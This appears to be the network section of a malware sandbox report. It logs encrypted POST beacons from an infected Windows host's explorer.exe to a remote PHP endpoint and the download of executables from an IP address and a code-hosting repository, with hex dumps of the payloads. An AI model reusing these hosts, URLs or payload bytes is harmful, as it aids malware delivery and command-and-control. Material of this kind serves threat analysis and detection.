Oct 4, 2024 19:20:41.512487888 CEST	330	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 4b b7 b8 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vuFKH#NhLqaCu/1N^#D]d9/7c["DUy"X3lxXk{Bv?BD(`f%M6eN+
Oct 4, 2024 19:20:42.964591026 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:20:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50042	180.75.11.133	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 19:20:56.199033976 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://syllqtgnchytfjbx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 172 Host: nwgrus.ru
Oct 4, 2024 19:20:56.199057102 CEST	172	OUT	Data Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 41 d2 85 Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA .[k,vu;AdJEDy-QK9>ubT3;0u9"1 WAGH\'
Oct 4, 2024 19:20:57.598699093 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 04 Oct 2024 17:20:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49792	23.145.40.164	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 17:18:04 UTC	162	OUT	GET /ksa9104.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.164
2024-10-04 17:18:04 UTC	327	IN	HTTP/1.1 200 OK Date: Fri, 04 Oct 2024 17:18:04 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Fri, 04 Oct 2024 17:00:02 GMT ETag: "38a00-623a99a265b8d" Accept-Ranges: bytes Content-Length: 231936 Connection: close Content-Type: application/x-msdos-program
2024-10-04 17:18:04 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 38 61 8d d7 7c 00 e3 84 7c 00 e3 84 7c 00 e3 84 c1 4f 75 84 7d 00 e3 84 62 52 67 84 66 00 e3 84 62 52 76 84 6c 00 e3 84 62 52 60 84 27 00 e3 84 5b c6 98 84 7b 00 e3 84 7c 00 e2 84 0a 00 e3 84 62 52 69 84 7d 00 e3 84 62 52 77 84 7d 00 e3 84 62 52 72 84 7d 00 e3 84 52 69 63 68 7c 00 e3 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9f 09 d6 64 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8a\|\|\|Ou}bRgfbRvlbR`'[{\|bRi}bRw}bRr}Rich\|PELd
2024-10-04 17:18:04 UTC	8000	IN	Data Raw: b9 94 ce 41 00 68 a4 87 41 00 2b c8 51 50 e8 fc 24 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 90 0d 00 00 83 c4 14 eb 02 33 f6 68 a0 87 41 00 53 57 e8 62 24 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 6c 0d 00 00 83 c4 14 8b 45 fc ff 34 c5 ac b2 41 00 53 57 e8 3d 24 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 47 0d 00 00 83 c4 14 68 10 20 01 00 68 78 87 41 00 57 e8 b0 22 00 00 83 c4 0c eb 32 6a f4 ff 15 ac 80 41 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac b2 41 00 ff 36 e8 19 25 00 00 59 50 ff 36 53 ff 15 f8 80 41 00 5f 5e 5b c9 c3 6a 03 e8 f5 25 00 00 59 83 f8 01 74 15 6a 03 e8 e8 25 00 00 59 85 c0 75 1f 83 3d 04 b0 41 00 01 75 16 68 fc 00 00 00 e8 29 fe ff ff 68 ff 00 00 00 e8 1f fe ff ff 59 59 c3 8b ff 55 8b ec 8b 45 08 Data Ascii: AhA+QP$t3VVVVV3hASWb$tVVVVVlE4ASW=$tVVVVVGh hxAW"2jA;t$tjEP4A6%YP6SA_^[j%Ytj%Yu=Auh)hYYUE
2024-10-04 17:18:04 UTC	8000	IN	Data Raw: 07 8a 46 01 c1 e9 02 88 47 01 83 c6 02 83 c7 02 83 f9 08 72 a6 f3 a5 ff 24 95 a4 4a 40 00 90 23 d1 8a 06 88 07 83 c6 01 c1 e9 02 83 c7 01 83 f9 08 72 88 f3 a5 ff 24 95 a4 4a 40 00 8d 49 00 9b 4a 40 00 88 4a 40 00 80 4a 40 00 78 4a 40 00 70 4a 40 00 68 4a 40 00 60 4a 40 00 58 4a 40 00 8b 44 8e e4 89 44 8f e4 8b 44 8e e8 89 44 8f e8 8b 44 8e ec 89 44 8f ec 8b 44 8e f0 89 44 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 a4 4a 40 00 8b ff b4 4a 40 00 bc 4a 40 00 c8 4a 40 00 dc 4a 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc Data Ascii: FGr$J@#r$J@IJ@J@J@xJ@pJ@hJ@`J@XJ@DDDDDDDDDDDDDD$J@J@J@J@J@E^_E^_FGE^_IFGFGE^_t1
2024-10-04 17:18:04 UTC	8000	IN	Data Raw: 07 8b 40 04 89 45 18 ff 75 1c e8 b4 04 00 00 59 83 f8 ff 75 04 33 c0 eb 47 3b 45 18 74 1e 53 53 8d 4d 10 51 ff 75 0c 50 ff 75 18 e8 dc 04 00 00 8b f0 83 c4 18 3b f3 74 dc 89 75 0c ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 75 1c ff 15 6c 81 41 00 8b f8 3b f3 74 07 56 e8 9f c8 ff ff 59 8b c7 8d 65 ec 5f 5e 5b 8b 4d fc 33 cd e8 57 a6 ff ff c9 c3 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 29 c2 ff ff ff 75 24 8d 4d f0 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c e8 16 fe ff ff 83 c4 1c 80 7d fc 00 74 07 8b 4d f8 83 61 70 fd c9 c3 8b ff 55 8b ec 56 8b 75 08 85 f6 0f 84 81 01 00 00 ff 76 04 e8 2f c8 ff ff ff 76 08 e8 27 c8 ff ff ff 76 0c e8 1f c8 ff ff ff 76 10 e8 17 c8 ff ff ff 76 14 e8 0f c8 ff ff ff 76 18 e8 07 c8 ff ff ff 36 e8 00 c8 ff ff ff 76 20 Data Ascii: @EuYu3G;EtSSMQuPu;tuuuuuulA;tVYe_^[M3WUuM)u$Mu uuuuu}tMapUVuv/v'vvvv6v
2024-10-04 17:18:04 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-10-04 17:18:05 UTC	8000	IN	Data Raw: da a7 13 8f ff 81 d4 49 dd be ff 45 d9 f2 4a 72 ea d2 58 f8 c4 40 52 9e 02 d6 88 49 3c 0a 28 8d fe 54 23 32 d0 9f 23 74 0e 47 29 29 c2 58 92 51 ae 08 da f7 5d 9a 31 b5 d0 1d 84 60 d4 05 70 89 f6 93 83 70 0b 54 1d 83 60 36 cf 9f 90 2e 73 60 97 84 a2 4c 1f 31 ca 29 5a 86 59 2b 38 54 da 27 5e 8d d3 78 c4 ee f5 a4 9b 14 2b 8a b2 b7 0e 79 71 73 27 c4 cc d5 b5 6a e5 0f 08 0a a9 ea ea e3 79 c5 b3 08 a3 5c 6b a8 c7 74 49 45 6b 66 e3 24 f4 44 fd 5a 43 ea c9 7f 69 db de 6e 0c 8c d4 a0 43 eb 3b ee d8 51 ef c1 09 f4 b4 99 97 20 b2 9b c9 29 8a 00 7b bd 11 7b 9b c7 6e d0 14 1c a7 58 2e 69 f2 bd 6f 81 4d 88 b8 2d 5a 61 b1 de 2b 04 67 08 87 14 dc d3 02 e6 52 35 4c e2 77 69 94 36 64 79 f8 71 6f 4b 5c 2c 63 ee 0e fc 00 20 fc 87 cd 19 ee a1 af 5c b8 87 57 25 67 53 b2 01 a7 Data Ascii: IEJrX@RI<(T#2#tG))XQ]1`ppT`6.s`L1)ZY+8T'^x+yqs'jy\ktIEkf$DZCinC;Q ){{nX.ioM-Za+gR5Lwi6dyqoK\,c \W%gS
2024-10-04 17:18:05 UTC	8000	IN	Data Raw: 14 f6 f5 9e bb b3 2e 46 e8 1f b8 71 7f 9f 0d fa a3 58 20 98 39 60 88 0a 13 ec c0 e4 60 49 b0 03 e7 42 c7 fc 59 b9 2d ee 65 2d c9 09 36 1a a4 19 ac 14 2c 11 e4 2a 40 c1 e0 34 15 bc d8 e7 e7 c5 6e 25 46 39 f9 fe f8 62 a0 f7 1c 9f 88 b4 b6 7a 80 fc 64 12 c0 d6 64 84 09 8e 39 eb 9f 64 6a 7f 9b 39 e6 3a 95 9d 98 ec 77 ec d1 1c 95 3f c4 ee a3 df b1 b6 81 66 1e ab 07 55 57 88 83 c9 85 78 39 b3 76 fb 2e c4 27 7c 2f 71 48 de fc 77 35 5d eb 9c 27 9d 26 38 ab 4a ba f5 53 fb ea d3 ab 5d c9 6f 6e 8d 08 84 fa c5 0c b2 02 3b 43 7e 83 46 b9 9b f9 ce 2e d5 94 5a a7 3a 06 88 2c 7f 6b 62 3b 38 98 8e 71 12 1d cf ce cd 5a f0 1c ca 11 30 11 14 ed 69 dd 27 0a 64 0d e2 84 eb b8 6d ac 2a d7 47 b1 5a 14 2c bb 7f 30 10 c9 2d ec 99 34 74 ca 70 39 26 30 6d 24 a7 d3 31 de ec e5 5c 8f Data Ascii: .FqX 9``IBY-e-6,@4n%F9bzdd9dj9:w?fUWx9v.'\|/qHw5]'&8JS]on;C~F.Z:,kb;8qZ0i'dmGZ,0-4tp9&0m$1\
2024-10-04 17:18:05 UTC	8000	IN	Data Raw: 3a f7 2a b1 7e a0 26 bd 89 6f 30 ea 6e 28 d5 34 84 83 51 5b 1d b0 f5 9f 33 c8 a2 1d e7 56 42 24 f9 07 f6 76 c8 17 be 47 fb fb e9 d8 13 28 fc 35 eb 5f 09 c8 28 01 f7 21 d9 79 6c c4 b8 ac 87 b2 3e 59 a7 58 0b 34 39 8a bc de 9b 57 0d aa ce 7b 79 69 97 cc e1 c6 d8 ea 27 ab 72 84 ba 85 be f1 74 d0 e3 c3 c6 00 1a c4 d6 6a dd a8 f1 3c 91 35 f6 48 dd 7c b2 67 97 01 e0 96 e5 66 ed 15 66 2c 83 63 23 92 a2 26 a4 95 25 23 b3 2f cb d0 f7 ef d9 d9 5f d8 53 ea 79 43 b7 5e cc f6 98 36 86 d5 cf af b6 99 e9 a5 7e 13 61 44 c6 08 ef 21 e8 ac 31 df 72 b9 2b ba 1a 88 66 a5 fc bf b6 79 c1 6a ca 13 56 eb 1e ff fd 2e c5 08 32 4e d7 2a 99 d9 a7 ad da 6c 8e 52 9f 86 fe f8 2b 52 15 38 b5 b7 26 0b c5 5b de 4e 85 8b 39 80 8e a6 ff cb ac 1c 17 8a 81 74 b2 32 7c 7f bc 5f 9c 4f a2 fd 62 Data Ascii: :~&o0n(4Q[3VB$vG(5_(!yl>YX49W{yi'rtj<5H\|gff,c#&%#/_SyC^6~aD!1r+fyjV.2NlR+R8&[N9t2\|_Ob
2024-10-04 17:18:05 UTC	8000	IN	Data Raw: 8f 42 3b 2f 83 7e 0f 21 00 7d 82 10 0d 51 bf 31 00 97 8f cc ed 1f 67 97 43 5b dd 83 d4 10 f7 f3 d9 a2 ae 85 43 03 43 1e 4b bd 53 33 26 6d fc 3d b9 79 68 53 b5 71 49 0d 15 c9 f9 b5 84 8a f5 53 ee 9a cc 1c 21 bf 3a 4a 36 33 09 18 41 af f0 99 53 42 1c 62 8b 51 cc 19 2d b3 6e b5 fb 7f 75 d7 86 0c c3 08 5c 62 bd 12 3f e3 bd c2 42 47 cb ae c9 53 a5 ff f3 b9 d2 a6 26 6e a6 2f 3c 06 2d 7b a1 d3 9e 24 9d 0a b4 51 a2 e9 4f 9f c7 9b 9d 95 dc 22 43 72 9a 88 8e 63 4b d7 24 ab c6 03 7c 99 40 5d a2 21 53 a5 8f 8c eb a8 e6 63 e7 9b ff 74 8d 73 e8 eb c3 82 47 d6 66 dc 70 17 81 14 28 4b c8 9d 27 c5 2e 0f 03 9e 87 4d 71 84 01 aa 6f 98 e7 ce 57 76 04 0b e0 61 19 6e 81 80 d8 04 ef eb 48 e5 4e b7 bf f1 40 31 3f be 87 68 f8 ed f7 48 20 23 d8 38 b5 ed 7e a2 bd e2 1e 37 27 aa 91 Data Ascii: B;/~!}Q1gC[CCKS3&m=yhSqIS!:J63ASBbQ-nu\b?BGS&n/<-{$QO"CrcK$\|@]!SctsGfp(K'.MqoWvanHN@1?hH #8~7'
2024-10-04 17:18:05 UTC	8000	IN	Data Raw: 69 4d 0f 4a 44 a8 c3 0b 99 81 89 bd 9a d6 d9 59 87 a9 e1 d6 8d e5 d5 71 69 bc fe 0c 5b 07 54 47 47 38 91 95 36 3a 39 a2 87 a4 59 98 37 10 85 4e 42 43 bf cc 45 d8 35 60 93 2e 1c fc fa d4 70 bd aa be 0c 92 02 85 a6 50 3a 8b fa 10 2f d4 37 de 2c e5 53 6d b0 69 04 18 38 d3 f4 f0 cf 38 60 68 54 6b bc fe 7d 74 70 f5 6d c6 a4 dc a6 30 13 d2 87 bd a9 6e 04 e6 57 19 19 f2 63 90 a2 19 8a 1e 10 18 25 d8 22 05 90 2e b0 8b a8 2c 8c ac 7f 85 73 37 f4 9d 1c 96 87 c8 eb 22 29 da 82 17 6c c7 cf 49 a4 63 89 33 17 28 2e bd 88 89 7b 5b 6d 2d 0a 70 4a 2a 1b 83 ee 9e 2b a7 2f ef 96 f8 4f 7e 37 01 85 34 0e d5 8f f5 fd 74 f0 bb 98 ea 7e aa 00 23 c3 32 2f db 3c 77 fb f1 f8 72 6e b0 f2 63 e8 60 f9 3b cd dd 31 24 02 2e 29 7f ab 3b 47 a7 4f 66 ad 20 20 e4 55 b6 7f 50 35 a1 fd 9e 75 Data Ascii: iMJDYqi[TGG86:9Y7NBCE5`.pP:/7,Smi88`hTk}tpm0nWc%".,s7")lIc3(.{[m-pJ*+/O~74t~#2/<wrnc`;1$.);GOf UP5u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49843	217.197.91.145	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-04 17:18:15 UTC	196	OUT	GET /alexcode11/templates/raw/branch/main/setup.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: codeberg.org
2024-10-04 17:18:16 UTC	835	IN	HTTP/1.1 200 OK access-control-expose-headers: Content-Disposition cache-control: private, max-age=300 content-disposition: inline; filename="setup.exe"; filename*=UTF-8''setup.exe content-length: 2021096 content-type: application/octet-stream etag: "931cc5cd86421960273f35c5125906288942171e" last-modified: Fri, 04 Oct 2024 15:31:47 GMT set-cookie: i_like_gitea=91f6071af1f11d8e; Path=/; HttpOnly; Secure; SameSite=Lax; Secure; SameSite=Lax set-cookie: _csrf=QgGqIzvG7ehUGvy_F7zD1ZIiLwI6MTcyODA2MjI5NTc1MTc0MDAzNg; Path=/; Max-Age=86400; HttpOnly; Secure; SameSite=Lax; Secure; SameSite=Lax date: Fri, 04 Oct 2024 17:18:16 GMT strict-transport-security: max-age=63072000; includeSubDomains; preload permissions-policy: interest-cohort=() x-frame-options: sameorigin x-content-type-options: nosniff connection: close
2024-10-04 17:18:16 UTC	14566	IN	Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 64 86 05 00 b1 7d ab 4f 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 08 00 00 f2 01 00 00 c6 00 00 00 00 00 00 90 f9 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 20 03 00 00 04 00 00 5d 56 0e 00 02 00 00 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 53 02 00 c8 00 00 00 00 d0 02 00 60 40 00 Data Ascii: MZ`@`!L!Require Windows$PEd}O#@ ]VS`@
2024-10-04 17:18:16 UTC	16320	IN	Data Raw: d8 00 00 00 48 8d 54 24 20 48 8d 4c 24 50 41 b8 e9 fd 00 00 e8 75 ed ff ff 48 8b d8 48 8d 44 24 70 48 3b d8 74 3f 48 8b 4c 24 70 44 89 64 24 78 66 44 89 21 8b 53 08 48 8d 4c 24 70 e8 69 cc ff ff 4c 8b 1b 48 8b 4c 24 70 41 0f b7 03 49 83 c3 02 66 89 01 48 83 c1 02 66 41 3b c4 75 eb 8b 43 08 89 44 24 78 48 8b 4c 24 50 e8 85 b0 01 00 48 8d 4c 24 70 e8 45 f2 ff ff 48 8b 6c 24 60 48 8d 15 45 d5 01 00 48 8b cd ff 15 c4 cc 01 00 48 8b 74 24 70 41 3b c4 75 15 66 ba 3d 00 48 8b ce e8 da 07 01 00 41 3b c4 0f 8e 35 01 00 00 4c 39 25 76 2a 02 00 48 8d 1d 6f 2a 02 00 74 79 48 8b 0b ff 15 4c cc 01 00 48 8b 13 48 8b cd 4c 63 c0 ff 15 55 d0 01 00 41 3b c4 74 09 48 83 c3 08 4c 39 23 75 da 4c 39 23 74 4e b9 20 00 00 00 e8 08 b0 01 00 49 3b c4 74 1c 48 8d 54 24 60 48 8b c8 Data Ascii: HT$ HL$PAuHHD$pH;t?HL$pDd$xfD!SHL$piLHL$pAIfHfA;uCD$xHL$PHL$pEHl$`HEHHt$pA;uf=HA;5L9%vHotyHLHHLcUA;tHL9#uL9#tN I;tHT$`H
2024-10-04 17:18:16 UTC	16320	IN	Data Raw: 04 77 08 41 b7 01 e9 83 fd ff ff 48 8d 94 24 a8 00 00 00 49 8d 4e 02 e8 5e da ff ff 48 3b c7 74 31 48 83 f8 01 74 08 4c 8b f0 e9 5f fd ff ff 48 8b 4c 24 60 e8 fb 70 01 00 48 3b df 74 09 48 8b 03 48 8b cb ff 50 10 8b fd e9 df 11 00 00 49 83 c6 04 48 8d 8c 24 a8 00 00 00 e8 a3 e1 ff ff 44 3a e7 0f 85 0c 02 00 00 f6 05 2f f7 01 00 04 0f 84 ff 01 00 00 e8 30 a5 ff ff 3b c7 0f 85 f2 01 00 00 be 03 00 00 00 48 8d 4c 24 40 48 89 7c 24 40 8b d6 89 7c 24 48 89 7c 24 4c e8 4a 8c ff ff 48 8d 8c 24 90 00 00 00 8b d6 48 89 bc 24 90 00 00 00 89 bc 24 98 00 00 00 89 bc 24 9c 00 00 00 e8 25 8c ff ff ff 15 17 8c 01 00 48 8d 54 24 40 48 8b c8 e8 9a e0 ff ff 48 8d 8c 24 80 00 00 00 48 8b d0 e8 9a a7 ff ff 4c 8d 44 24 40 48 8d 8c 24 30 01 00 00 66 ba 22 00 e8 88 dc ff ff 4c Data Ascii: wAH$IN^H;t1HtL_HL$`pH;tHHPIH$D:/0;HL$@H\|$@\|$H\|$LJH$H$$$%HT$@HH$HLD$@H$0f"L
2024-10-04 17:18:16 UTC	16320	IN	Data Raw: b8 01 00 48 89 0d a0 b8 01 00 e8 0f db ff ff 48 8b 4e 08 8b d3 ff 15 4f 50 01 00 41 b9 00 00 30 75 45 33 c0 48 8b c8 ba 01 04 00 00 ff 15 00 51 01 00 4c 8b 05 61 b7 01 00 4d 85 c0 74 36 8d 53 fc 48 8b ce e8 65 e0 ff ff 48 8b 4e 08 48 8b 3d 46 b7 01 00 8d 53 fc ff 15 0d 50 01 00 48 8b d7 48 8b c8 48 8b d8 ff 15 16 50 01 00 48 8b cb e8 82 93 ff ff f6 05 27 b1 01 00 04 74 5a 44 8b c5 ba b5 04 00 00 48 8b ce e8 91 da ff ff 48 8b 4e 08 ba b5 04 00 00 ff 15 ce 4f 01 00 bf f0 ff ff ff 48 8b c8 8b d7 ff 15 ae 4f 01 00 48 8b 4e 08 ba b5 04 00 00 48 8b d8 48 0b dd ff 15 a9 4f 01 00 4c 8b c3 48 8b c8 8b d7 ff 15 73 50 01 00 48 8b ce e8 8f e4 ff ff 39 2d fd b6 01 00 75 32 45 33 c0 ba b4 04 00 00 48 8b ce e8 2f da ff ff 48 8b 4e 08 33 d2 ff 15 a7 4e 01 00 48 85 c0 74 Data Ascii: HHNOPA0uE3HQLaMt6SHeHNH=FSPHHHPH'tZDHHNOHOHNHHOLHsPH9-u2E3H/HN3NHt
2024-10-04 17:18:16 UTC	16320	IN	Data Raw: 00 41 8b cb bb 01 00 00 00 41 d3 e2 48 8b d3 41 8b ca 48 2b c8 49 8d bc 4d 5e 05 00 00 90 66 66 66 90 66 66 66 90 66 66 66 90 48 03 d2 41 81 f9 00 00 00 01 0f b7 0c 3a 73 13 0f b6 45 00 41 c1 e0 08 41 c1 e1 08 44 0b c0 48 83 c5 01 41 8b c1 c1 e8 0b 0f af c1 44 3b c0 73 16 44 8b c8 b8 00 08 00 00 2b c1 c1 e8 05 66 03 c1 66 89 04 3a eb 1a 44 2b c8 44 2b c0 8b c1 c1 e8 05 48 83 c2 01 66 2b c8 44 0b d3 66 89 4c 3a ff 03 db 41 83 eb 01 75 97 e9 16 02 00 00 41 83 eb 04 41 81 f9 00 00 00 01 73 13 0f b6 45 00 41 c1 e0 08 41 c1 e1 08 44 0b c0 48 83 c5 01 41 d1 e9 45 2b c1 41 8b c0 c1 e8 1f f7 d8 46 8d 54 50 01 41 23 c1 44 03 c0 41 83 eb 01 75 c5 41 0f b7 8d 46 06 00 00 41 c1 e2 04 41 81 f9 00 00 00 01 73 13 0f b6 45 00 41 c1 e0 08 41 c1 e1 08 44 0b c0 48 83 c5 01 Data Ascii: AAHAH+IM^fffffffffHA:sEAADHAD;sD+ff:D+D+Hf+DfL:AuAAsEAADHAE+AFTPA#DAuAFAAsEAADH
2024-10-04 17:18:16 UTC	16320	IN	Data Raw: 03 48 8b 01 ff 50 08 33 c0 48 83 c4 20 5b c3 b8 02 40 00 80 48 83 c4 20 5b c3 40 53 48 83 ec 20 41 83 f8 05 48 8b d9 73 0b b8 57 00 07 80 48 83 c4 20 5b c3 0f b6 02 48 89 7c 24 30 3c 02 88 81 70 4b 00 00 8b 7a 01 72 61 3c 40 77 5d 8d 87 00 f8 ff ff 3d db f7 ff ff 77 50 48 83 c1 40 ba 00 00 10 00 e8 f2 e3 ff ff 84 c0 75 10 b8 0e 00 07 80 48 8b 7c 24 30 48 83 c4 20 5b c3 48 8d 8b 80 00 00 00 4c 8d 05 08 36 01 00 8b d7 e8 09 e6 ff ff 48 8b 7c 24 30 33 c9 85 c0 ba 0e 00 07 80 0f 44 ca 8b c1 48 83 c4 20 5b c3 b8 01 40 00 80 48 8b 7c 24 30 48 83 c4 20 5b c3 48 89 5c 24 18 48 89 6c 24 20 56 57 41 54 48 83 ec 20 48 8b f9 8b 89 7c 4b 00 00 33 f6 85 c9 45 8b e0 48 8b ea 74 17 83 e9 02 0f 84 60 01 00 00 83 f9 01 0f 85 b0 00 00 00 e9 60 01 00 00 48 8b 47 60 48 89 77 Data Ascii: HP3H [@H [@SH AHsWH [H\|$0<pKzra<@w]=wPH@uH\|$0H [HL6H\|$03DH [@H\|$0H [H\$Hl$ VWATH H\|K3EHt``HG`Hw
2024-10-04 17:18:16 UTC	16320	IN	Data Raw: 01 75 d8 44 8b c3 8b d7 48 8b cd 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 83 c4 20 41 5d 41 5c 5f e9 72 cb ff ff cc cc 48 83 ec 28 8b 41 6c 48 8b d1 85 c0 75 07 33 c0 48 83 c4 28 c3 83 c0 ff 78 2c 33 c9 39 4a 2c 7e 19 4c 8b 42 30 49 83 c0 04 41 39 00 74 0f 83 c1 01 49 83 c0 08 3b 4a 2c 7c ef 83 c9 ff 85 c9 78 1f 83 e8 01 79 d4 48 8d 15 43 ce 00 00 48 8d 4c 24 30 c7 44 24 30 01 00 00 00 e8 09 72 00 00 cc 48 63 c8 48 8b 42 70 48 8b 04 c8 eb a3 cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 8b 02 48 8b f1 48 8b fa 89 01 8b 42 04 48 83 c1 08 89 41 fc 33 c0 48 c7 41 18 01 00 00 00 89 41 08 89 41 0c 48 89 41 10 48 8d 05 a2 b4 00 00 48 89 01 e8 72 ca ff ff 48 8d 57 08 48 8d 4e 08 e8 45 fd ff ff 4c 8b 5f 28 48 8b 5c 24 30 4c 89 5e 28 48 8b c6 48 8b Data Ascii: uDHH\$@Hl$HHt$PH A]A\_rH(AlHu3H(x,39J,~LB0IA9tI;J,\|xyHCHL$0D$0rHcHBpHH\$Ht$WH HHBHA3HAAAHAHHrHWHNEL_(H\$0L^(HH
2024-10-04 17:18:16 UTC	11546	IN	Data Raw: 64 24 60 44 89 b4 24 88 00 00 00 44 89 b4 24 8c 00 00 00 4c 89 b4 24 90 00 00 00 44 89 b4 24 a8 00 00 00 44 89 b4 24 ac 00 00 00 4c 89 b4 24 b0 00 00 00 48 c7 84 24 b8 00 00 00 04 00 00 00 4c 89 ac 24 a0 00 00 00 44 89 b4 24 c8 00 00 00 44 89 b4 24 cc 00 00 00 4c 89 b4 24 d0 00 00 00 44 88 b4 24 e4 00 00 00 e8 0e 32 00 00 49 3b c6 74 12 48 8d 54 24 60 48 8b c8 e8 94 fd ff ff 48 8b d8 eb 03 49 8b de 49 8b cf e8 14 8b ff ff 4d 63 5f 0c 49 8b 47 10 4a 89 1c d8 41 83 47 0c 01 48 8d 8c 24 c0 00 00 00 e8 9e 8b ff ff 48 8d 8c 24 a0 00 00 00 e8 91 8b ff ff 48 8d 8c 24 80 00 00 00 e8 84 8b ff ff 48 8d 4c 24 60 4c 89 64 24 60 e8 bd 8a ff ff 48 8d 4c 24 60 e8 6b 8b ff ff 4d 63 5f 0c 49 8b 57 10 4a 8b 54 da f8 48 8b cf e8 32 f9 ff ff 48 83 ed 01 b9 08 00 00 00 0f 85 Data Ascii: 